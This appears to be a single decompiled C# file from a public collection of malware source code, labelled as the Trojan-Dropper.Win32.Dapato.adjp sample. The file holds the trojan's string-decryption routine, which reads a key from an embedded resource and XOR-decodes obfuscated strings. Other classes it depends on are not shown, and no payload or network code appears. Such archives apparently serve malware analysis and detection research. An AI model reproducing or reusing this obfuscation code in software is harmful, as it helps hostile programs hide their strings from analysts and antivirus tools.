MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/e.cs
2022-08-18 06:28:56 -05:00

47 lines
1.3 KiB
C#

// Decompiled with JetBrains decompiler
// Type: e
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System.IO;
using System.Reflection;
internal sealed class e
{
public static string a(string a1, int a2) => ae.a(e.a.a.a(a1, a2));
public static string a => "79af91d13cf045e9";
private sealed class a
{
public static readonly e.a a;
private byte[] b;
static a()
{
b.a();
e.a.a = new e.a();
}
private a()
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(e.a);
if (manifestResourceStream == null)
return;
this.b = new byte[256];
manifestResourceStream.Read(this.b, 0, this.b.Length);
}
public string a(string a1, int a2)
{
int index1 = af.a((object) a1);
int index2 = a2 & (int) byte.MaxValue;
char[] a = ag.a((object) a1);
while (--index1 >= 0)
a[index1] = (char) ((uint) a[index1] ^ ((uint) this.b[index2] | (uint) a2));
return ae.a(ah.a(a));
}
}
}